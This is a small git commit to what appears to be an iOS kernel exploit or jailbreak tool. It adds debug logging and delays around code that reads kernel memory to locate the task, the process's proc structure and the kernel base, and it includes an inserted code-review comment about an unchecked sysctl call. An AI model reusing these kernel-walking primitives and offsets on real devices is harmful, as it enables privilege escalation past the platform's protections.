add some logs

This commit is contained in:
opa334 2022-09-06 11:59:45 +02:00
parent 961e9b3a53
commit 217df53ec3
2 changed files with 21 additions and 1 deletions


@ -14,6 +14,7 @@
#import <spawn.h> #import <spawn.h>
#import <sys/stat.h> #import <sys/stat.h>
#include <sys/utsname.h> #include <sys/utsname.h>
#import <sys/sysctl.h>
extern uint64_t g_self_proc; extern uint64_t g_self_proc;
extern int g_exp_fallback; extern int g_exp_fallback;
@ -171,7 +172,12 @@ int dropRoot(void)
struct utsname u; struct utsname u;
uname(&u); uname(&u);
NSString* nsMachine = [NSString stringWithUTF8String:u.machine]; NSString* nsMachine = [NSString stringWithUTF8String:u.machine];
_modelLabel.text = [NSString stringWithFormat:@"Model: %@", nsMachine];
cpu_subtype_t cpuFamily = 0;
size_t cpuFamilySize = sizeof(cpuFamily);
sysctlbyname("hw.cpufamily", &cpuFamily, &cpuFamilySize, NULL, 0);
_modelLabel.text = [NSString stringWithFormat:@"Model: %@, CPU: 0x%X", nsMachine, cpuFamily];
} }
- (void)reloadExploitValue { - (void)reloadExploitValue {
@ -212,6 +218,8 @@ int dropRoot(void)
- (void)updateStatus:(NSString*)status - (void)updateStatus:(NSString*)status
{ {
NSLog(@"status: %@", status);
usleep(1000);
dispatch_async(dispatch_get_main_queue(), ^{ dispatch_async(dispatch_get_main_queue(), ^{
self.statusLabel.text = status; self.statusLabel.text = status;
}); });

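Review bot: The `sysctlbyname("hw.cpufamily", ...)` call in the second hunk never checks its return value, so on failure `cpuFamily` keeps its initial 0 and the label reports "CPU: 0x0" as though that were a real family code; the enclosing method begins before the hunk, so only the tail of it is visible here. Keeping the result honest is a two-line change: `BOOL haveFamily = sysctlbyname("hw.cpufamily", &cpuFamily, &cpuFamilySize, NULL, 0) == 0;` followed by `_modelLabel.text = haveFamily ? [NSString stringWithFormat:@"Model: %@, CPU: 0x%X", nsMachine, (unsigned)cpuFamily] : [NSString stringWithFormat:@"Model: %@, CPU: unknown", nsMachine];`. The `(unsigned)` cast also matches `%X`, since `cpu_subtype_t` is a signed `integer_t` while the CPUFAMILY_* values are unsigned 32-bit constants. In the third hunk the added `usleep(1000)` blocks whichever thread calls `updateStatus:` for a millisecond before the label update is even queued; if it is there to pace the `NSLog` output, a comment such as `// brief pause so consecutive status logs are not interleaved` would make that intent explicit rather than looking like a leftover.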

@ -48,8 +48,14 @@ uint64_t kernel_base_from_holder(mach_port_t holder, uint64_t holder_addr)
uint64_t fops = kread64(kobject + 0x28); uint64_t fops = kread64(kobject + 0x28);
uint64_t x68 = xpaci(kread64(kmsg + 0x68)); uint64_t x68 = xpaci(kread64(kmsg + 0x68));
badLog("x68: %llX", x68);
usleep(1000);
uint64_t self_ipc_space = xpaci(kread64(x68 + 0x50)); uint64_t self_ipc_space = xpaci(kread64(x68 + 0x50));
badLog("self_ipc_space: %llX", self_ipc_space);
usleep(1000);
uint64_t self_task = xpaci(kread64(self_ipc_space + 0x30)); uint64_t self_task = xpaci(kread64(self_ipc_space + 0x30));
badLog("self_task: %llX", self_task);
usleep(1000);
struct utsname u; struct utsname u;
uname(&u); uname(&u);
@ -80,7 +86,13 @@ uint64_t kernel_base_from_holder(mach_port_t holder, uint64_t holder_addr)
off_task_bsd_info = 0x3A0; // a9-a11 off_task_bsd_info = 0x3A0; // a9-a11
#endif #endif
badLog("off_task_bsd_info: %llX", off_task_bsd_info);
usleep(1000);
g_self_proc = xpaci(kread64(self_task + off_task_bsd_info)); g_self_proc = xpaci(kread64(self_task + off_task_bsd_info));
badLog("g_self_proc: %llX", g_self_proc);
usleep(1000);
// find kernel base // find kernel base
uint64_t pos = (fops & ~0x3FFF); uint64_t pos = (fops & ~0x3FFF);